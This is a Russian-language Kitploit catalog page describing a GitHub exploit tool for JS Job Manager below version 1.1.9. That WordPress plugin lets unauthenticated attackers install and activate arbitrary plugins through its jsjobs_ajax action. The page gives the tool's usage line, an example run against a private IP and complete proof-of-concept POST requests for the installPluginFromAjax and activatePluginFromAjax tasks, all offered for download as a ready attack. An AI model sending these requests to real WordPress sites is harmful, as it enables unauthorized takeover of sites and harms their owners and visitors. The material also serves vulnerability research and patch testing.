Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
js-jobs — JS Job Manager < 1.1.9 - Произвольная установка/активация плагинов без аутентификации | Kitploit
Инструменты/GitHubGitHub/randomrobbiebf/js-jobs
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubrandomrobbiebf/js-jobs

js-jobs

JS Job Manager < 1.1.9 - Произвольная установка/активация плагинов без аутентификации

Репозиторий
13 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

js-jobs

JS Job Manager < 1.1.9 - Неаутентифицированная произвольная установка/активация плагинов

Описание

AJAX-действие jsjobs_ajax плагина, доступное как аутентифицированным, так и неаутентифицированным пользователям, не имеет надлежащих проверок авторизации и CSRF, в частности при использовании installPluginFromAjax и activatePluginFromAjax, что может позволить неаутентифицированным злоумышленникам устанавливать произвольные плагины из репозитория WordPress и активировать их (с некоторыми ограничениями).

Контроля над версией плагина нет, поэтому будет установлена последняя версия плагина.

Как использовать

root@kitploit:~
usage: js-jobs.py [-h] --url URL --slug SLUG
js-jobs.py: error: the following arguments are required: --url/-u, --slug/-s

Пример

root@kitploit:~
$ python3 js-jobs.py --url http://192.168.1.131:5555 -s woocommerce
Plugin has been Downloaded.
Plugin has been downloaded and is on the server.
Plugin has been activated / activated.

Доказательство концепции

Для установки плагина:

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 90
Connection: close

action=jsjobs_ajax&task=installPluginFromAjax&jsjobsme=jsjobs&pluginslug=<slug>

Для активации плагина (здесь есть ограничение: плагин должен содержать файл /.php, иначе он не будет активирован):

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 78
Connection: close

action=jsjobs_ajax&task=activatePluginFromAjax&jsjobsme=jsjobs&pluginslug=<slug> 
Скачать инструмент